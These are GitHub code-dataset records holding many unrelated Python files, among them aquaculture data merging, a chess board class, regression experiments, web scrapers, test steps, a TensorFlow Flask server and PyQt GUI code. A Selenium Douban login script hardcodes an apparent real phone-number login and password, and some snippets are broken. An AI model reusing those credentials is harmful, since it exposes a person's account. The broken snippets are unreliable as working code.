ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_SPECIES_GROUPS.csv\", \n [\"3A_Code\", \"Name_En\", \"Scientific_Name\"], \"SPECIES.ALPHA_3_CODE\", \"Species\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/FSJ_UNIT.csv\", [\"Code\", \"Name_En\"], \n \"MEASURE\", \"Measure_Unit_Quantity\")\n\n# fish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/FSJ_UNIT.csv\", [\"Code\", \"Name_En\"], \n# \"MEASURE_y\", \"Measure_Unit_ValueUSD\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_SYMBOL.csv\", [\"Symbol\", \"Name_En\"], \n \"STATUS\", \"Statistical_Symbol_Quantity\")\n\n# fish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_SYMBOL.csv\", [\"Symbol\", \"Name_En\"], \n# \"STATUS_y\", \"Statistical_Symbol_ValueUSD\")\n\n\n# split the data into animal and non-animal\nnon_fish_quantity, fish_quantity = ffprep.split_plant_animal(fish_quantity, variables.plant_list)\n\n\n#write final merged dataframe to file\nfish_quantity.to_csv(\"Aquaculture_Quantity_Code_Merged.csv\", index = False)\nnon_fish_quantity.to_csv(\"Aquaculture_Non_Fish_Quantity_Code_Merged.csv\", index = False)","repo_name":"seenstevo/Pisciculture_EDA","sub_path":"src/utils/get_merge_fao_aquaculture_data.py","file_name":"get_merge_fao_aquaculture_data.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74238284968","text":"class InvalidSquareException(Exception):\n pass\n\n\nclass Square(object):\n u\"\"\"Represents the coordinates of any square on the chess board.\"\"\"\n\n def __init__(self, square_name=None, x=None, y=None, piece=None):\n u\"\"\"Returns the square on a chess board.\n\n square_name -- The name of the chess square\n x -- The x-coordinate of the chess square, 1-indexed, left to right\n y -- The y-coordinate of the chess square, 1-indexed, white pieces start on 1 and 2, black on 7 and 8\n piece -- A chess piece to place in this square\n\n The square can be by specifying EITHER the name of the square OR the x, y coordinates.\n If both are specified then this method raises an exception.\n \"\"\"\n if square_name is None:\n square_name = Square._nameFromCoords(x, y)\n\n else:\n if (x is not None) or (y is not None):\n raise InvalidSquareException(u\"Only square_name or x,y coords should be defined\")\n x, y = Square._coordsFromName(square_name)\n\n self.name = square_name.upper()\n self.x = x\n self.y = y\n self.piece = piece\n\n @property\n def row(self):\n return self.y\n\n @property\n def column(self):\n return chr(ord(u'A') + self.x - 1)\n\n @staticmethod\n def _nameFromCoords(x, y):\n u\"\"\"Maps x,y coordinates like A4 to x,y coordinates like (1, 4).\n\n The white player starts on rows with y values 1, and 2, while the black players pieces start on rows 7 and 8.\n x coordinates increment left to right.\n\n x -- The square from left to right\n y -- The square from bottom to top, starting from white players side\n\n Returns -- The name of the square\n Raises -- InvalidSquareException if the square is not on the chess board\n\n \"\"\"\n if 1 <= x <= 8 and 1 <= y <= 8:\n name = chr(ord(u'A') + x - 1) + str(y)\n return name\n else:\n raise InvalidSquareException(\n \"The square ({x}, {y}), does not exist on a chess board. X and Y must be between 1 and 8 (inclusive).\".\n format(x=x, y=y)\n )\n\n @staticmethod\n def _coordsFromName(name):\n u\"\"\"Maps square names like H6 to x,y coordinates like (8, 6)\n\n The white player starts on rows with y values 1, and 2, while the black players pieces start on rows 7 and 8.\n x coordinates increment left to right.\n\n name -- The name of the Square\n Returns -- x, y coordinates of this square\n Raises -- InvalidSquareException if the square is not on the chess board\n\n \"\"\"\n x = ord(name[0].upper()) - ord(u'A') + 1\n y = int(name[1])\n\n if 1 <= x <= 8 and 1 <= y <= 8:\n return x, y\n else:\n raise InvalidSquareException(\n \"The square {name}, does not exist on a chess board. \".format(name=name)\n )\n\n def pop(self):\n u\"\"\"Removes the current piece from this square and returns it\"\"\"\n piece = self.piece\n self.piece = None\n return piece\n\n @staticmethod\n def _isValidSquare(x, y):\n U\"\"\"Returns true if the x, and y coordinates are within a chess board (both between 1 and 8).\"\"\"\n if 0 < x <= 8 and 0 < y <= 8:\n return True\n else:\n return False\n\n def isAdjacent(self, square_name):\n u\"\"\"Returns True if two squares are horizontally, vertically or diagonally adjacent (side by side).\"\"\"\n if self.name != square_name:\n x, y = self._coordsFromName(square_name)\n if abs(self.x - x) <= 1:\n if abs(self.y - y) <= 1:\n return True\n return False\n\n def direction(self, to_):\n u\"\"\"The direction from this square to to_ is normalized to have x and y components of 0 or 1.\n\n Normalization involves keeping the ratio of x and y components the same (so the direction is the same,\n but reducing the magnitured of the x and y components to either 1 or 0 each.\n\n to_ -- The name of another Square\n returns -- One of (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0), (-1, -1), (1,-1)\n or if the vector cannot be reduced to one of these None\n \"\"\"\n to_square = Square(to_)\n x = to_square.x - self.x\n y = to_square.y - self.y\n\n if x == 0:\n y = y / abs(y)\n elif y == 0:\n x = x / abs(x)\n elif abs(x) == abs(y):\n x = x / abs(x)\n y = y / abs(y)\n else:\n # Can't be normalized (ratio)\n return None\n return (x, y)\n","repo_name":"CheyneWilson/chess","sub_path":"chess/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35521712209","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\nimport glob\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime, timedelta\n\n\n# In[ ]:\n\n\ndef create_Summary(project,row):\n \n project['sentDate'] = pd.to_datetime(project['sentDate'],format='%Y-%m-%d %H:%M:%S.%f')\n \n project = project[project['sentDate'].notnull()]\n project = project.sort_values('sentDate')\n \n df = pd.DataFrame()\n df.loc[row,'Project'] = project['projectId'][project.index[0]]\n\n project.groupby('fromOrganizationId')\n df.loc[row,'Number_of_Organizations'] = len(project.groupby('fromOrganizationId').count())\n \n df.loc[row,'Project_Duration'] = int((project['sentDate'][project.index[-1]] - project['sentDate'][project.index[0]]).days)\n\n project.groupby('fromUserId')\n df.loc[row,'Number_of_Users'] = len(project.groupby('fromUserId').count())\n\n project.groupby('correspondenceTypeId')\n df.loc[row,'Kinds_Of_Correspondence'] = len(project.groupby('correspondenceTypeId').count())\n \n df.loc[row,'Number of mails'] = len(project)\n\n return df\n\n\n# In[ ]:\n\n\n# Reading all the .csv files into one\n#path =r'C:\\Users\\212342133\\Documents\\Python Scripts\\1_Exploration\\Aconex\\Data+science+-+test+(June+2017)\\Data science - test (June 2017)\\correspondence_data'\nallFiles = glob.glob(\"*.csv\")\n\n\n# In[ ]:\n\n\nframe = pd.DataFrame()\nlist_ = []\nfor index,file_ in enumerate(allFiles):\n df = pd.read_csv(file_, index_col=None, header=0)\n df = create_Summary(df,index)\n list_.append(df)\nframe_summary = pd.concat(list_)\n\n\n# In[ ]:\n\n\nframe_summary.to_excel('frame_summary.xlsx',index=False)\n\n\n# In[ ]:\n\n\nframe_summary = pd.read_excel('frame_summary.xlsx')\n\n\n# In[ ]:\n\n\nframe_summary.describe\n\n\n# In[ ]:\n\n\nimport seaborn as sns\nget_ipython().magic('matplotlib inline')\n\n\n# In[ ]:\n\n\nsns.heatmap(frame_summary.corr())\n\n\n# In[ ]:\n\n\nsns.jointplot(x='Project_Duration',y='Kinds_Of_Correspondence',data=frame_summary)\n\n\n# In[ ]:\n\n\nsns.pairplot(frame_summary)\n\n\n# In[ ]:\n\n\nframe_summary.head()\n\n\n# In[ ]:\n\n\nimport sklearn\nfrom sklearn.preprocessing import MinMaxScaler\n\nscaler = MinMaxScaler()\n\n\n# In[ ]:\n\n\nframe_summary[['Number_of_Organizations','Project_Duration','Number_of_Users','Kinds_Of_Correspondence','Number of mails']] = scaler.fit_transform(frame_summary[['Number_of_Organizations','Project_Duration','Number_of_Users','Kinds_Of_Correspondence','Number of mails']]) \n\n\n# In[ ]:\n\n\nframe_summary.head()\n\n\n# In[ ]:\n\n\nsns.pairplot(frame_summary)\n\n\n# In[ ]:\n\n\nframe_summary_sorted = frame_summary.sort_values('Project_Duration', ascending=False)\nframe_summary_top = frame_summary_sorted[2000:]\n#sns.pairplot(frame_summary_top)\nsns.heatmap(frame_summary_top.corr())\n\n\n# In[ ]:\n\n\nframe_model = frame_summary.drop('Project', 1)\nframe_model_X = frame_model.drop('Project_Duration',1)\nframe_model_y = frame_model['Project_Duration']\n\n\n# In[ ]:\n\n\nframe_model.head()\n\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(frame_model_X, frame_model_y, test_size = 0.3, random_state = 1)\n\n\n# In[ ]:\n\n\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.model_selection import cross_val_score\n\n\n# In[ ]:\n\n\ncross_val_score(regressor, X_train, y_train, cv=10)\n\n\n# In[ ]:\n\n\n# - -------\n\n\n# In[ ]:\n\n\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\n\nregressor = SVR(kernel = 'rbf')\nregressor.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\n# Training Error\npredictions = regressor.predict(X_train)\nprint('MAE:', metrics.mean_absolute_error(y_train, predictions))\nprint('MSE:', metrics.mean_squared_error(y_train, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, predictions)))\n\n\n# In[ ]:\n\n\n# Prediction Error\npredictions = regressor.predict(X_test)\nprint('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))\n\n\n# In[ ]:\n\n\nfrom sklearn.tree import DecisionTreeRegressor\n\ndtree = DecisionTreeRegressor()\ndtree.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\n# Training Error\npredictions = dtree.predict(X_train)\nprint('MAE:', metrics.mean_absolute_error(y_train, predictions))\nprint('MSE:', metrics.mean_squared_error(y_train, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, predictions)))\n\n\n# In[ ]:\n\n\n# Prediction Error\npredictions = dtree.predict(X_test)\nprint('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))\n\n\n# In[ ]:\n\n\nfrom sklearn.ensemble import RandomForestRegressor\nforest = RandomForestRegressor(n_estimators=1000)\nforest.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\n# Training Error\npredictions = forest.predict(X_train)\nprint('MAE:', metrics.mean_absolute_error(y_train, predictions))\nprint('MSE:', metrics.mean_squared_error(y_train, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, predictions)))\n\n\n# In[ ]:\n\n\n# Prediction Error\npredictions = forest.predict(X_test)\nprint('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))\n\n\n\n","repo_name":"abhinavy8011/aconex","sub_path":"Aconex.py","file_name":"Aconex.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10460424159","text":"#selenium模拟登录\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport requests\nfrom fake_useragent import UserAgent\n\ndriver = webdriver.Chrome(executable_path='/home/bc/桌面/chromedriver')\ndriver.get('https://douban.com')\n#显示等待,目的为了等待页面全部加载完毕\ndriver.implicitly_wait(10)\ndriver.find_element_by_id('form_email').send_keys('18518753265')\ndriver.find_element_by_id('form_password').send_keys('ljh123456')\ndriver.find_element_by_class_name('bn-submit').click()\nprint(driver.get_cookies())\ndriver.get('')\nprint(driver.s)\n\ncookie_str = ''\nfor cookie in driver.get_cookies():\n print(type(cookie))\n cookie_str += cookie['name']+cookie['value']+'; '\n\nua = UserAgent()\nprint(cookie_str[:-2])\nheaders = {\n 'User-Agent':ua.chrome,\n 'cookie':cookie_str,\n}\n\n\n# driver = webdriver.Chrome(executable_path='/home/bc/桌面/chromedriver')\n# driver.get('https://weibo.com')\n# #显示等待,目的为了等待页面全部加载完毕\n# driver.implicitly_wait(10)\n# driver.find_element_by_id('form_email').send_keys('')\n# driver.find_element_by_id('form_password').send_keys('')\n# driver.find_element_by_class_name('bn-submit').click()\n\n","repo_name":"hanfang302/Webcrawler","sub_path":"爬虫基础/模拟登录.py","file_name":"模拟登录.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12504805261","text":"import time\nimport os\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nuserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\nheaders = {\n 'User-Agent':userAgent\n}\nurl = 'https://www.104.com.tw/jobs/search/?keyword=資料分析師&page=%s'\nfor i in range(0,10):\n res = requests.get(url%(i), headers = headers)\n soup = BeautifulSoup(res.text, 'html.parser')\n jobs = soup.select('div[class=\"b-block__left\"]')\n for job in jobs:\n try:\n pre_new_url = job.select('a[class=\"js-job-link\"]')[0]\n aa = str(pre_new_url[\"href\"]).split('b/')[1].split('?')[0]\n new_url = f'https://www.104.com.tw/job/ajax/content/'+aa\n new_headers = {\n 'User-Agent':userAgent,\n 'Referer': f'https://www.104.com.tw/job/'+aa\n }\n new_res = requests.get(new_url, headers = new_headers)\n job_content = new_res.json()\n print(\"===========================職缺============================\")\n print(job_content['data']['header']['jobName'])\n print(job_content['data']['header']['custName'])\n print(\"-------------------------工作項目---------------------------\")\n print(job_content['data']['jobDetail']['jobDescription'])\n print('網址: https://www.104.com.tw/job/'+aa+'\\n')\n except :\n print(\"\")\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~next page')\n\n\n\n\n\n","repo_name":"annchenrz/work","sub_path":"104_job.py","file_name":"104_job.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26097178954","text":"from behave import *\nfrom pages.ServiciosPage import ServiciosPage\n\n\n@when(u'Click en boton eliminar')\ndef step_impl(context):\n try:\n ServiciosPage.ClickBotonEliminar(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Click en boton eliminar\"\n\n\n@when(u'Confirmar Baja')\ndef step_impl(context):\n try:\n ServiciosPage.ConfirmarBaja(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Confirmar Baja\"\n\n\n@then(u'Validar baja servicio')\ndef step_impl(context):\n try:\n ServiciosPage.ValidateToastBajaServicio(context)\n context.driver.close()\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Validar baja servicio\"\n","repo_name":"MarcosIannello/AutomationBDD_Python_selenium","sub_path":"TestAutomation/features/steps/ServicioBaja.py","file_name":"ServicioBaja.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5499044586","text":"#!/usr/bin/env python\n# usage: bash tf_classify_server.sh [PORT_NUMBER]\nfrom flask import Flask, request\nimport tensorflow as tf\nimport label_image as tf_classify\nimport json\napp = Flask(__name__)\nFLAGS, unparsed = tf_classify.parser.parse_known_args()\nlabels = tf_classify.load_labels(FLAGS.labels)\ntf_classify.load_graph(FLAGS.graph)\nsess = tf.Session()\n@app.route('/', methods=['POST'])\ndef classify():\n try:\n data = request.files.get('data').read()\n result = tf_classify.run_graph(data, labels, FLAGS.input_layer, FLAGS.output_layer, FLAGS.num_top_predictions, sess)\n return json.dumps(result), 200\n except Exception as e:\n return repr(e), 500\napp.run(host='127.0.0.1',port=12480 if len(unparsed) == 0 else int(unparsed[0]))\n\n","repo_name":"hiveml/simple-ml-serving","sub_path":"tf_classify_server.py","file_name":"tf_classify_server.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"53"} +{"seq_id":"7493873257","text":"import pickle\nimport os\nimport random\nimport numpy as np\nimport torch\nimport argparse\nimport matplotlib.pyplot as plt\n\nLOG2PI = 0.5 * np.log(2 * np.pi)\n\nclass AttrDict(dict):\n\n __setattr__ = dict.__setitem__\n __getattr__ = dict.__getitem__\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\ndef select_gpus(gpus=\"0\"):\n '''\n gpus -> string, examples: \"0\", \"0,1,2\"\n ''' \n os.environ['CUDA_VISIBLE_DEVICES'] = gpus\n\ndef step_loader(dataloder):\n data = iter(dataloder)\n while True:\n try:\n x = next(data)\n except:\n data = iter(dataloder)\n x = next(data)\n yield x\n\ndef nats2bits(nats):\n return nats / np.log(2)\n\ndef bits2nats(bits):\n return bits * np.log(2)\n\ndef pickle_data(data, filename):\n with open(filename, 'wb') as f:\n pickle.dump(data, f)\n\ndef load_pkl(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\ndef create_dir(folder):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\ndef save_npz(filename, d):\n np.savez_compressed(filename, **d)\n\ndef load_npz(filename):\n data = np.load(filename)\n return {k : v for k, v in data.items()}\n\ndef save_gif(filename, video, fps=10):\n \"\"\"\n save the input video to gif\n filename: String\n video: ndarray with shape [T, H, W, C]\n \"\"\"\n import moviepy.editor as mpy\n clip = mpy.ImageSequenceClip([video[i]for i in range(video.shape[0])], fps=fps)\n clip.write_gif(filename, verbose=False, logger=None)\n\ndef random_move(input_folder, target_folder):\n \"\"\"randomly move a file from input folder to target folder\"\"\"\n filename = random.choice(os.listdir(input_folder))\n os.system(f'mv {os.path.join(input_folder, filename)} {os.path.join(target_folder, filename)}')\n\ndef expert_build(max_index):\n \"\"\"rename expert traj in current path and only maintain max_index number of traj\"\"\"\n file_list = sorted(os.listdir('.'))\n file_list.reverse()\n for i, filename in enumerate(file_list):\n if i < max_index:\n target_file = 'expert_traj_{}_501.npz'.format(i)\n os.system(f'mv {filename} {target_file}')\n else:\n os.system(f'rm {filename}')\n\ndef get_config_type(v):\n if isinstance(v, list):\n return lambda x : list(map(int, x.split(',')))\n if isinstance(v, bool):\n return lambda x: bool([False, True].index(int(x)))\n return type(v)\n\ndef parse_args(config={}):\n parser = argparse.ArgumentParser()\n for k, v in config.items():\n parser.add_argument(f'--{k}', type=get_config_type(v), default=v, help=f'default : {v}')\n args = parser.parse_args()\n return args\n\ndef tsplot(ax, data, **kw):\n \"\"\"plot with std shade\"\"\"\n x = np.arange(data.shape[1])\n est = np.mean(data, axis=0)\n sd = np.std(data, axis=0)\n cis = (est - sd, est + sd)\n ax.fill_between(x, cis[0], cis[1], alpha=0.2, **kw)\n ax.plot(x, est, **kw)\n ax.margins(x=0)\n\ndef show_grad(x, net):\n out = net(x)\n if not isinstance(out, torch.Tensor):\n out = out.mode()\n out.backward(torch.ones_like(out))\n img = x.grad[0].permute(1, 2, 0).numpy()\n img = np.abs(img)\n img = img / np.max(img)\n plt.imshow(img)\n plt.show()","repo_name":"IcarusWizard/GEM","sub_path":"gem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70791053288","text":"import os\nimport pytest\nimport ezdxf\nBASEDIR = 'integration_tests' if os.path.exists('integration_tests') else '.'\nDATADIR = 'data'\n\n\n@pytest.fixture(params=['Leica_Disto_S910.dxf'])\ndef filename(request):\n filename = os.path.join(BASEDIR, DATADIR, request.param)\n if not os.path.exists(filename):\n pytest.skip('File {} not found.'.format(filename))\n return filename\n\n\ndef test_leica_disto_r12(filename):\n # new entity system: legacy mode not necessary\n dwg = ezdxf.readfile(filename, legacy_mode=False)\n msp = dwg.modelspace()\n points = list(msp.query('POINT'))\n assert len(points) == 11\n assert len(points[0].dxf.location) == 3\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"integration_tests/test_leica_disto_r12.py","file_name":"test_leica_disto_r12.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41040814902","text":"# -*- coding:utf-8 -*-\n\ndef check_len(path,times=0): #path为log文档的绝对地址,记得加r。times是要显示测试信息的条数,不输入则全显示\n from pprint import pprint\n import re\n import random\n f = open(path, \"r\", encoding='utf-8')\n lines = f.readlines() # 读取全部内容 ,并以列表方式返回\n wrong_dic = {}\n i=1\n for line in lines:\n wrong = re.findall(r\"#(.*?)#[{]\", line)[0]\n #print(wrong)\n wrong = '#' + wrong + '#'\n wrong_type_list = re.findall(r\"#(.*?):\", wrong)\n wrong_title = re.findall(r'\"公告标题\": (.*?),',line)[0]\n second_list = [0, []]\n # i+=1\n # print(i)\n # print(wrong_type_list)\n if '跳转前网页' in line:\n wrong_url = re.findall(r'\"跳转前网页\": (.*?),', line)[0]\n else:\n wrong_url = re.findall(r'\"origin_url\": (.*?),', line)[0]\n small_dic = {wrong_title: wrong_url}\n for wrong_type in wrong_type_list:\n if wrong_type in wrong_dic.keys():\n wrong_dic[wrong_type][0] += 1\n wrong_dic[wrong_type][1].append(small_dic)\n else:\n second_list[0]=i\n second_list[1].append(small_dic)\n wrong_dic.update({wrong_type:second_list})\n for wrong_type in wrong_dic.keys():\n if times ==0:\n pass\n elif len(wrong_dic[wrong_type][1]) > 6:\n i=0\n test_list =[]\n while i < times:\n i+=1\n test_list.append(random.choice(wrong_dic[wrong_type][1]))\n wrong_dic[wrong_type][1] = test_list\n\n pprint(wrong_dic)\n\n\nif __name__ == '__main__':\n #path = r'D:\\迅雷下载\\company_info_extrator\\log_files\\2021-01-08\\Waring_ContentLenMoreThan100.log'\n #path = r'D:\\work\\company_info_extrator\\log_files\\2021-01-11\\Waring_WeiZhiKeyWords.log'\n path = r'D:\\work\\company_info_extrator\\log_files\\2021-01-11\\Waring_ContentLenMoreThan100.log'\n times = 6\n check_len(path,times)#path为log文档的绝对地址,记得加r。times是要显示测试信息的条数,不输入则全显示\n","repo_name":"limtless/limitless","sub_path":"tools/check_waring_len.py","file_name":"check_waring_len.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43104413327","text":"import json\nfrom pathlib import Path\n\nfrom tree_sitter import Language\n\n\nclass QueriedLanguage(Language):\n \"\"\"\n Wrapper class for tree-sitter Language class. Uses prepared queries\n to make some operations more convenient\n \"\"\"\n def __init__(self, library_path: str, name: str, queries_path: Path):\n \"\"\"\n Inits tree-sitter Language object with additional capture_query method that allows\n using prepared queries\n\n :param library_path: path to the tree-sitter library object\n :param name: programming language that should be parsed\n :param queries_path: path to the tree-sitter queries folder\n \"\"\"\n super().__init__(library_path, name)\n\n with (queries_path / f\"{name}_queries.json\").open(\"r\") as fr:\n queries = json.load(fr)\n self.query_types = {q_type: self.query(q_text) for q_type, q_text in queries.items()}\n\n def capture_query(self, query_type, root_node):\n \"\"\"\n Executes one of prepared query for the root_node of the given tree\n :param query_type: which query to use (check which is available in class)\n :param root_node: root node of parsed code tree\n :return: list of all captures for the query\n \"\"\"\n if query_type not in self.query_types:\n raise ValueError(f\"{query_type} not in prepared queries.\"\n f\"\\nChoose one of {', '.join(self.query_types.keys())}\")\n\n return self.query_types[query_type].captures(root_node)\n","repo_name":"HSE-JetBrains-department/2022_similar_dev_search_arifkhanov","sub_path":"source_code/code_parsing/queried_language.py","file_name":"queried_language.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35286996260","text":"class Teacher:\n def __init__(self, first_name, last_name, students):\n self.first_name = first_name\n self.last_name = last_name\n self.number_of_students = students\n\n def show_information(self):\n print(f'Full name: {self.first_name} {self.last_name}\\n'\n f'Number of students: {self.number_of_students}')\n\n\nclass Mathematics(Teacher):\n def __init__(self, number, *args, **kwargs):\n self.favorite_number = number\n super().__init__(*args, **kwargs)\n\n def show_information(self):\n print(f'Full name: {self.first_name} {self.last_name}\\n'\n f'Number of students: {self.number_of_students}\\n'\n f'Favorite number: {self.favorite_number}')\n\n\nteacher = Teacher('John', 'Gomez', 30)\nteacher.show_information()\n\nprint('------------------------')\n\nmathematics = Mathematics(first_name='Tom', last_name='Smith', students=35, number=10)\nmathematics.show_information()\n","repo_name":"szymcio32/python-object-oriented-programming-course","sub_path":"chapter-3/method_overriding.py","file_name":"method_overriding.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25410526760","text":"from PyQt4 import QtCore, QtGui\nimport numpy as np\nimport gui.globals as globals\nimport gui.utility as utility\n \nclass loads_ui(QtGui.QWidget): \n \n def setup(self, window): \n \"\"\"Set up and initialise loads tab\"\"\"\n \n self.main_window = window \n \n title1 = QtGui.QLabel('Load variability')\n title1.setFont(QtGui.QFont('arial', weight=QtGui.QFont.Bold))\n \n label1 = QtGui.QLabel('Summer Dispersion:')\n label1.setFixedWidth(100)\n \n self.edit_sigma_s = QtGui.QLineEdit()\n self.edit_sigma_s.setFixedWidth(100)\n \n label2 = QtGui.QLabel('Winter Dispersion:')\n label2.setFixedWidth(100)\n \n self.edit_sigma_w = QtGui.QLineEdit()\n self.edit_sigma_w.setFixedWidth(100)\n \n title2 = QtGui.QLabel('Hourly load data')\n title2.setFont(QtGui.QFont('arial', weight=QtGui.QFont.Bold))\n \n headings = ['Summer (kW)', 'Winter (kW)']\n self.tableWidget = SolarTable(window, headings = headings, alternatingRowColors = True)\n self.tableWidget.setMinimumHeight(500)\n vheadings = ['00:00', '01:00', '02:00', '03:00', '04:00', '05:00', '06:00', '07:00', '08:00', '09:00', '10:00', '11:00', '12:00', '13:00', '14:00', '15:00', '16:00', '17:00', '18:00', '19:00', '20:00', '21:00', '22:00', '23:00']\n self.tableWidget.setRowCount(len(vheadings)) \n self.tableWidget.setVerticalHeaderLabels(vheadings)\n \n layout = QtGui.QGridLayout()\n layout.addWidget(title1, 0, 0)\n layout.addWidget(label1, 1, 0)\n layout.addWidget(self.edit_sigma_s, 1, 1)\n layout.addWidget(label2, 2, 0)\n layout.addWidget(self.edit_sigma_w, 2, 1)\n layout.addWidget(title2, 3, 0, 1, 2)\n layout.addWidget(self.tableWidget, 4, 0, 10, 3)\n self.setLayout(layout)\n\n self.edit_sigma_s.editingFinished.connect(utility.create_validation_hook(self, self.edit_sigma_s, \"Summer dispersion\", 0, 99999))\n \n self.edit_sigma_w.editingFinished.connect(utility.create_validation_hook(self, self.edit_sigma_w, \"Winter dispersion\", 0, 99999))\n \n self.tableWidget.itemChanged.connect(self.update_data_matrix)\n\n self.refresh_data() \n \n def update_data(self):\n \"\"\"Update global variables to match GUI fields\"\"\"\n globals.load_sigma[0] = float(self.edit_sigma_s.text())\n globals.load_sigma[1] = float(self.edit_sigma_w.text())\n \n def update_data_matrix(self, tableWidgetItem): \n \"\"\"Update load matrix whenever table data is changed\"\"\"\n value = 0.0\n if tableWidgetItem.column() == 0:\n element = \"Summer Load\"\n lower_bound = 0.0\n upper_bound = 999999\n value = utility.validate(tableWidgetItem.text(), lower_bound, upper_bound, l_inclusive = True, u_inclusive = False)\n elif tableWidgetItem.column() == 1:\n element = \"Winter Load\"\n lower_bound = 0.0\n upper_bound = 999999\n value = utility.validate(tableWidgetItem.text(), lower_bound, upper_bound, l_inclusive = True, u_inclusive = False)\n \n if value is not False: \n columns = [0,1] \n column = columns[tableWidgetItem.column()]\n update_mapping = (globals.loads[tableWidgetItem.row(), column] != value) \n globals.loads[tableWidgetItem.row(), column] = value\n #tableWidgetItem.setText(str(value))\n \n else:\n self.main_window.show_status_message(element + \" Hour \" + str(tableWidgetItem.row()) + \": Input value '\" + tableWidgetItem.text() + \"' out of bounds. (\" + str(lower_bound) + \" to \" + str(upper_bound) + \"). Value not set.\", error = True, beep = True)\n self.tableWidget.itemChanged.disconnect()\n self.refresh_data() \n self.tableWidget.itemChanged.connect(self.update_data_matrix) \n \n def refresh_data(self):\n \"\"\"Update GUI fields to match global variables\"\"\"\n self.edit_sigma_s.setText(str(globals.load_sigma[0]))\n self.edit_sigma_w.setText(str(globals.load_sigma[1]))\n self.tableWidget.fill_table(globals.loads)\n \nclass SolarTable(utility.CentaurTable): \n \"\"\"Modified version of LowFi table specifically for the Right Of Way tab.\"\"\"\n\n def signal_mapping(signal_mapper):\n self.signal_mapper = signal_mapper\n\n def fill_table(self, data):\n \"\"\"Fill table from 2D list or numpy array.\"\"\"\n if len(data) > 0:\n if isinstance(data, np.ndarray):\n data = data.tolist()\n data_rows = len(data)\n data_columns = len(data[0])\n \n if data_columns > 0:\n self.setRowCount(data_rows)\n for r in range(0, data_rows):\n # Update real columns\n for c in range(2):\n item = QtGui.QTableWidgetItem() \n item.setText(str(data[r][c])) \n self.setItem(r, c, item)","repo_name":"Tivieta/CENTAUR","sub_path":"gui/gui_loads.py","file_name":"gui_loads.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 